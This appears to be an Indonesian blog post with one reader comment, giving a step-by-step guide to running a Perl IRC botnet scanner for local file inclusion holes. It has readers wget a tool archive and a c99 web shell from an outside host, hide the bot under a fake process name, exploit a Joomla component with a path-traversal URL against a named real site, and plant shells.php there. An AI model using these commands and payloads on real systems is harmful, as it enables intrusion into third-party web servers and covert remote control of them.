Bikin bot LFI scanner:
aku buat bot lfi nya banyak dalam 1 folder biar u gak capek² upload ke shells, cukup 1x aja :)
nama bot nya a - z
1. Siapkan shell yang support perl <-
2. direktori full write /var/tmp ato /dev/shm
3. wget http://www.rajawalitelevisi.com/tmp.tar.gz
4. tar -zxvf tmp.tar.gz
5. masuk ke Dir / Folder tmp
6. jalankan bot LFI
Command : perl a.txt host port botnick botident botchan yournick fakeproc
Contoh : perl a.txt irc.reload-x.org 6667 botlfi botident reload-x bogel /usr/sbin/httpd
7. tunggu aja bot lfi nya masuk ke server yg u load.
8. klo bot nya udah muncul ketik aja !help di channel.
9. bot lfi siap tempur hahahaha =))
Cara scan bot nya :
ketik di channel : !a buglfi dorklfi
Contoh : !a /index.php?option=com_ccnewsletter&controller= "com_ccnewsletter"
tunggu aja bot nya scan
klo bot nya keluar seperti di bawah ini :
(@Joker)(@GooGLe)(@PHPSheLL) http://lakhrajforgings.com///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../tmp/shell1657 (@Linux host.dnshorizon2.com 2.6.9-023stab052.4-enterprise #1 SMP Tue May 11 19:40:55 MSD 2010 i686)(@ReLoaD-X)
itu berarti u dapet hasil scan nya :P
buka mozilla u,terus copy paste aja tuh target yg keluar.
Contoh nya gini :
http://lakhrajforgings.com//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../tmp/shell1657
Copy paste aja di mozilla u.. ntar langsung masuk ke shells inject nya.
ketik : wget http://www.rajawalitelevisi.com/c99.txt -O shells.php
klo udah, jadi target nya ini : http://lakhrajforgings.com/shells.php
- Sekian -
bos linkx mati nuh... mintak donk sourcenya... kl gak repot email aja ke dishanicholson@aol.com... suwun... :D
BalasHapus